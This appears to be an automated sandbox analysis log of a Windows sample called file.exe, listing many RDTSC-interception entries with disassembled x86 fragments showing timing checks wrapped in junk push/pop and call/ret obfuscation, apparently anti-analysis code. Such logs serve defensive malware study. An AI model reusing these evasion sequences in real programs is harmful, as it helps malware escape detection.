                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA676E second address: AA6774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6417 second address: AA641C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA641C second address: AA642F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDF30F40A5Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA7165 second address: AA7169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABC02 second address: AABC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAADF6 second address: AAADFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AACC07 second address: AACC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AACC0D second address: AACC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AACCE0 second address: AACCFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30F40A69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AACCFD second address: AACD03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AACD03 second address: AACD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADD92 second address: AADDFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FDF30D0E2F8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007FDF30D0E2F8h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 00000019h 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 mov dword ptr [ebp+122D2915h], eax 0x00000046 push 00000000h 0x00000048 movsx edi, bx 0x0000004b xchg eax, esi 0x0000004c pushad 0x0000004d jg 00007FDF30D0E2F8h 0x00000053 pushad 0x00000054 push eax 0x00000055 pop eax 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADDFC second address: AADE0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jng 00007FDF30F40A58h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABD7A second address: AABE09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D3562h], edi 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007FDF30D0E2F8h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D2F91h], edi 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push 00000000h 0x00000040 push edx 0x00000041 call 00007FDF30D0E2F8h 0x00000046 pop edx 0x00000047 mov dword ptr [esp+04h], edx 0x0000004b add dword ptr [esp+04h], 0000001Bh 0x00000053 inc edx 0x00000054 push edx 0x00000055 ret 0x00000056 pop edx 0x00000057 ret 0x00000058 mov dword ptr [ebp+122D1965h], edi 0x0000005e mov eax, dword ptr [ebp+122D024Dh] 0x00000064 add bx, 68A1h 0x00000069 push FFFFFFFFh 0x0000006b add di, 86DDh 0x00000070 nop 0x00000071 push eax 0x00000072 push edx 0x00000073 push ecx 0x00000074 jnl 00007FDF30D0E2F6h 0x0000007a pop ecx 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABE09 second address: AABE1D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDF30F40A58h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABE1D second address: AABE22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABE22 second address: AABE27 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE04E second address: AAE056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0DFF second address: AB0E33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30F40A69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FDF30F40A60h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0E33 second address: AB0E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FDF30D0E2F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAFF71 second address: AAFF92 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FDF30F40A65h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAFF92 second address: AAFF99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2E48 second address: AB2ED7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FDF30F40A6Eh 0x00000008 jmp 00007FDF30F40A68h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FDF30F40A58h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c call 00007FDF30F40A66h 0x00000031 or dword ptr [ebp+122D1C5Ah], esi 0x00000037 pop edi 0x00000038 sub dword ptr [ebp+1244C820h], eax 0x0000003e push 00000000h 0x00000040 mov edi, 6F8D8D34h 0x00000045 add edi, 01F9E321h 0x0000004b push 00000000h 0x0000004d movzx ebx, si 0x00000050 xchg eax, esi 0x00000051 push edi 0x00000052 pushad 0x00000053 push esi 0x00000054 pop esi 0x00000055 pushad 0x00000056 popad 0x00000057 popad 0x00000058 pop edi 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push ecx 0x0000005d jo 00007FDF30F40A56h 0x00000063 pop ecx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB1068 second address: AB10F7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov ebx, dword ptr [ebp+122D28A4h] 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FDF30D0E2F8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007FDF30D0E2F8h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 push eax 0x00000051 mov dword ptr [ebp+122D233Bh], ebx 0x00000057 pop edi 0x00000058 sub dword ptr [ebp+1244C4F6h], ebx 0x0000005e mov bh, 2Bh 0x00000060 mov eax, dword ptr [ebp+122D0905h] 0x00000066 push ebx 0x00000067 mov ebx, dword ptr [ebp+122D1C7Ch] 0x0000006d pop ebx 0x0000006e push FFFFFFFFh 0x00000070 or dword ptr [ebp+122D17F1h], eax 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push edi 0x0000007a jo 00007FDF30D0E2F6h 0x00000080 pop edi 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB20A8 second address: AB20B2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDF30F40A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4F82 second address: AB4F99 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FDF30D0E2F6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FDF30D0E2F6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4F99 second address: AB4F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4F9D second address: AB4FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4FA3 second address: AB500C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDF30F40A58h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d pushad 0x0000000e mov ax, 5890h 0x00000012 popad 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FDF30F40A58h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f sub dword ptr [ebp+122D28F3h], edi 0x00000035 push 00000000h 0x00000037 mov di, 8867h 0x0000003b push eax 0x0000003c pushad 0x0000003d jmp 00007FDF30F40A5Eh 0x00000042 pushad 0x00000043 jmp 00007FDF30F40A60h 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB7097 second address: AB70B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30D0E2FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FDF30D0E2F8h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB70B5 second address: AB70BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3124 second address: AB3128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8F95 second address: AB8F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC2369 second address: AC2396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jnp 00007FDF30D0E2F6h 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007FDF30D0E2F6h 0x0000001b jmp 00007FDF30D0E302h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC2396 second address: AC23A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDF30F40A5Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC23A6 second address: AC23AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC23AC second address: AC23B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC23B2 second address: AC23B8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC2690 second address: AC2696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7F73 second address: AC7FAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDF30D0E2FDh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jc 00007FDF30D0E300h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jnp 00007FDF30D0E2FCh 0x00000020 jnc 00007FDF30D0E2F6h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7FAB second address: AC7FB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7FB2 second address: AC7FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FDF30D0E2FEh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7FD2 second address: AC7FD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8138 second address: AC8177 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDF30D0E2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jc 00007FDF30D0E2F8h 0x00000013 push edx 0x00000014 jnl 00007FDF30D0E2F6h 0x0000001a pop edx 0x0000001b popad 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 push eax 0x00000021 pushad 0x00000022 push esi 0x00000023 pop esi 0x00000024 jmp 00007FDF30D0E300h 0x00000029 popad 0x0000002a pop eax 0x0000002b mov eax, dword ptr [eax] 0x0000002d push ebx 0x0000002e push eax 0x0000002f push edx 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8177 second address: AC818D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jng 00007FDF30F40A60h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC4A3 second address: ACC4C0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FDF30D0E306h 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC4C0 second address: ACC4E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDF30F40A69h 0x00000009 js 00007FDF30F40A56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC4E5 second address: ACC4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007FDF30D0E329h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FDF30D0E2F6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC4FA second address: ACC51B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FDF30F40A67h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC51B second address: ACC51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC6AC second address: ACC6CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FDF30F40A68h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC80F second address: ACC81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDF30D0E2F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC81C second address: ACC828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FDF30F40A56h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACCBCE second address: ACCC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDF30D0E309h 0x00000009 jmp 00007FDF30D0E308h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACCC0A second address: ACCC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACCC0E second address: ACCC2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FDF30D0E2F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FDF30D0E2FEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACCC2B second address: ACCC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACCD66 second address: ACCD6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACCD6A second address: ACCD6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACCD6E second address: ACCD78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACCD78 second address: ACCD7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACCD7C second address: ACCD86 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDF30D0E2F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52887 second address: A5289B instructions: 0x00000000 rdtsc 0x00000002 js 00007FDF30F40A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FDF30F40A56h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5289B second address: A528DA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDF30D0E2F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FDF30D0E307h 0x00000011 pushad 0x00000012 jnp 00007FDF30D0E2F6h 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FDF30D0E2FFh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD1967 second address: AD196B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD1AAA second address: AD1AB4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDF30D0E2F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD20E6 second address: AD20EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD264C second address: AD2659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FDF30D0E2F6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC976 second address: ADC97A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC97A second address: ADC993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDF30D0E2FFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC993 second address: ADC997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC997 second address: ADC9B5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDF30D0E305h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC9B5 second address: ADC9BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC9BB second address: ADC9C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC9C1 second address: ADC9CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC9CD second address: ADC9D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADB6B7 second address: ADB6C5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADB6C5 second address: ADB6DA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FDF30D0E300h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADB7F3 second address: ADB7FD instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDF30F40A56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBC78 second address: ADBC82 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDF30D0E2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBDB8 second address: ADBDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
